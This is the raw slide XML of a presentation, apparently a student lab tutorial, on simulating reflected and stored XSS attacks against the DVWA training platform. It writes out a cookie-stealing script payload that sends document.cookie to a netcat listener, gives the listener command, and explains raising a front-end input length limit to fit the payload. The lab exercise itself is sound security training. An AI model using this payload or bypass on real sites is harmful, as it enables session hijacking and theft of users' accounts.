            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5936758" w="7309125">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7309125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7309125" y="5936758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5936758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="674880"/>
            <a:ext cx="9871939" cy="1864997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="7260"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600" spc="132">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>SIMULATION OF AN ATTACK ON DVWA.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="3116765"/>
            <a:ext cx="7633943" cy="5449570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>DVWA is a web platform specifically used for performing hacker attacks. To execute an XSS attack, we will need a script (to be inserted in the XSS section) and a netcat command to monitor its correct operation on the desired port. The procedure will be performed with a defense system set to low.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>The script we will use is as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='http://127.0.0.1:8888/?cookie='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>While the netcat command will be: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Semi-Bold"/>
              </a:rPr>
              <a:t>nc -l -p + "port to attack"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>To open the DVWA page, a communicating victim machine (ping) with the attacking machine and its IP is required to access the page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16020037" y="777797"/>
            <a:ext cx="1239263" cy="123926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7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="16020037" y="685784"/>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a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>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7973071" y="3554425"/>
            <a:ext cx="9693501" cy="4717673"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4717673" w="9693501">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9693501" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9693501" y="4717672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4717672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1311626" y="1085850"/>
            <a:ext cx="7112007" cy="2273300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="160">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>XSS REFLECTED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1311626" y="3970107"/>
            <a:ext cx="6003074" cy="3496945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Once the netcat command is set up and initiated in the command prompt, and the script is inserted into the XSS reflected section of DVWA, the attack will be executed, and cookies will be stolen, rendering access and page loading on DVWA inaccessible. The result should correspond to that of the image shown here.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351189" y="4144139"/>
            <a:ext cx="11585622" cy="5503170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5503170" w="11585622">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11585622" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11585622" y="5503171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5503171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1204332" y="716915"/>
            <a:ext cx="6703311" cy="2273300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="160">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>XSS STORED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10197792" y="621665"/>
            <a:ext cx="6755783" cy="3106420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>To carry out this attack, we need to perform an additional step to allow the complete writing of the script, as there is a limitation on the number of characters that can be entered, which is set at 50. To modify it, simply update the front-end by changing the maximum number of characters allowed from 50 to a higher value, as shown in the image.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2334527" y="3240926"/>
            <a:ext cx="13618946" cy="6468999"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6468999" w="13618946">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13618946" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13618946" y="6468999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6468999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="517492"/>
            <a:ext cx="11623299" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>At this point, it is sufficient to fill out the requests. We will enter a name of your choice and the script: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Semi-Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='http://127.0.0.1:8888/?cookie='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>. At this point, the attack will be executed and will remain permanent because by changing the sections of DVWA and then returning to XSS stored, the page will remain inaccessible. The result will be as shown in the image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DAF6UgK6UL8</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>XSS ATTACK</dc:title>
</cp:coreProperties>
</file>